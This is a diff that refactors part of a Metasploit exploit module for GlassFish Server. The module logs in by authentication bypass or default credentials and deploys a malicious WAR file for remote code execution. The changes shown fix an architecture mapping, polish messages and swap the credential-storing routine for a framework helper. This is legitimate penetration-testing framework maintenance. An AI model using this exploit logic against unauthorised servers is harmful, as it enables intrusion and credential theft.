@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'nokogiri'
 require 'metasploit/framework/login_scanner/glassfish'
 require 'metasploit/framework/credential_collection'
@@ -19,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
       'Description'    => %q{
-          This module logs in to an GlassFish Server (Open Source or Commercial) using various
+          This module logs in to a GlassFish Server (Open Source or Commercial) using various
         methods (such as authentication bypass, default credentials, or user-supplied login),
         and deploys a malicious war file in order to get remote code execution. It has been
         tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer
@@ -57,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
           OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
           OptString.new('TARGETURI', [ true,  "The URI path of the GlassFish Server", '/']),
           OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
-        ], self.class)
+        ])
   end
 
   #
@@ -147,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
         when 'x86', 'i386', 'i686'
           return ARCH_X86
         when 'x86_64', 'amd64'
-          return ARCH_X86
+          return ARCH_X64
         end
       end
     end
@@ -623,7 +622,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Print upload result
     if res && res.code == 302
-      print_status("Successfully uploaded")
+      print_good("Successfully Uploaded")
     else
       print_error("Error uploading #{res.code}")
       return
@@ -719,35 +718,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def my_target_host
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
+    "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
   end
 
 
-  def report_cred(opts)
-    service_data = {
-      address: rhost,
-      port: rport,
-      service_name: 'glassfish',
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
-    credential_data = {
-      module_fullname: fullname,
-      post_reference_name: self.refname,
-      private_data: opts[:password],
-      origin_type: :service,
-      private_type: :password,
-      username: opts[:user]
-    }.merge(service_data)
-
-    login_data = {
-      core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
-      last_attempted_at: DateTime.now
-    }.merge(service_data)
-
-    create_credential_login(login_data)
+  def service_details
+    super.merge({ post_reference_name: self.refname })
   end
 
   def try_normal_login(version)
@@ -784,7 +760,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Trying to login as #{cred.public}:#{cred.private}")
       result = @scanner.attempt_login(cred)
       if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
-        report_cred(user: cred.public, password: cred.private)
+        store_valid_credential(user: cred.public, private: cred.private) # changes service_name to http || https
         return @scanner.jsession
       end
     end
